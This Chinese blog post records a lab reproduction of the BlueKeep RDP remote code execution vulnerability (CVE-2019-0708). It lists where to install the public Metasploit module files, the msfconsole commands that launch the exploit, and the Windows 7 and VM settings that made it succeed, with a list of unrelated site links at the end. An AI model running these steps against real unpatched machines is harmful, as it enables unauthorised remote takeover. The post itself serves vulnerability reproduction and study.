cve_2019_0708_bluekeep复现采坑
2024-09-01 07:41:03
0X01 简介
Microsoft Windows是美国微软公司发布的视窗操作系统。远程桌面连接是微软从Windows 2000 Server开始提供的功能组件。
2019年5月14日,微软发布了月度安全更新补丁,修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标 Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。
近日,Metasploit发布了该漏洞的利用模块,GitHub网站上也公开了该漏洞的利用代码,引起了安全研究人员的广泛关注。目前该漏洞利用仅对Windows 7 SP1 x64与Windows 2008 R2 x64(非系统默认配置)系统版本有效,在虚拟机环境下复现成功。
0x02 漏洞复现
下载利用脚本,放在对应的目录,进入msf后需reload_all重新加载模块。
kali攻击机下载metasploit攻击脚本,kali中执行以下命令。
rdp.rb ->
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb ->
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb ->
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ->
/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
攻击:
Msfconsole
reload_all 重新加载所有的模块,将新添加的模块加载上。
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 目标IP
set target 3 3代表目标机器架构为VMware
exploit/run 开始攻击
9月7日win7专业版复现失败!
看github上有几位大佬virtubox复现成功,安装virtubox,重新安装新的win7系统进行测试,发现还是不行。
目前这个利用脚本并不是很稳定,最近github看了很多国际友人的留言,参见文后注意事项。
9月9日复现
将专业版升级到旗舰版
复现成功,反复几次,很稳定。
利用注意事项(目前感觉win7旗舰版是最稳定的)
1.win7 x64 旗舰版 sp1
2. windows版本 6.1.7601
3.vmware设置2个内核、2G内存(涉及到内存机制)
0x03 参考链接
最新文章
- 关于ES3、ES5、ES6以及ES7所有数组的方法(api)的总结
- NOIp 0904 出题报告
- C++ version the delaunay triangulation
- Can't add self as subview的困惑
- jquery介绍
- ecshop检验邮件是否合法
- ASP.NET5 静态文件
- 矩阵的奇异值分解(SVD)(理论)
- Ubuntu 16.04 安装Mysql 5.7 踩坑小记
- 解决:My97DatePicker 日期插件引用在PHP文件中maxDate和minDate控制失效问题
- Spring Boot 2.x 综合示例-整合thymeleaf、mybatis、shiro、logging、cache开发一个文章发布管理系统
- CSS3-1
- Spring使用Autowiring自动装配 解决提示报错小技巧
- 利用 Linux tap/tun 虚拟设备写一个 ICMP echo 程序
- PHP7 学习笔记(六)403 Forbidden - WAMP Server 2.5
- window对象方法之setTimeout(),setInterval()
- 【BZOJ 4569】 4569: [Scoi2016]萌萌哒 (倍增+并查集)
- java异常处理及自定义异常的使用
- 编程笔记:JavaScript 中的类型检查
- [Python爬虫] 之二十六:Selenium +phantomjs 利用 pyquery抓取智能电视网站图片信息